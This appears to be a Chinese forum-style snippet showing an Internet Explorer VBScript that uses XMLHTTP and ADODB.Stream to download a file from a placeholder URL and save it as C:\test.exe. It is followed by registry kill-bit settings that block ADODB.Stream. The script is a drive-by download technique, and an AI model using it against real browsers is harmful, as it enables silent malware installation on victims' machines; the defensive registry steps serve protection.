<script language=vbscript>
const adTypeBinary=1
const adSaveCreateOverwrite=2
const adModeReadWrite=3
set xmlHTTP=createObject("microsoft.xmlHTTP")
xmlHTTP.open "GET","目标URL,可以是任意文件",false '最后一个参数是设置是否异步访问
xmlHTTP.send
contents=xmlHTTP.responseBody '这里是关键,也可以不用xmlHTTP对象,用HTTP也可以,
'但要返回有文件的内容
set oStr=createObject("ADODB.stream")
oStr.mode=adModeReadWrite
oStr.Type=adTypeBinary
oStr.open
ostr.write(contents) '前面返回的内容
oStr.savetofile "C:\\test.exe",adSaveCreateOverwrite
</script>
如何防范?
1下载专杀工具,估计也是卸载adodb.stream
2改注册表
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet
Explorer\ActiveX Compatibility\{4B106874-DD36-11D0-8B44-00A024DD9EFF}
里dword值Compatibility Flags=0x00000400
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet
Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}
第一个是adodb.stream2.5 第二个是2.7
这样当 Internet Explorer 识别此注册表项时,Internet Explorer 不允许在浏览器中启动此组件。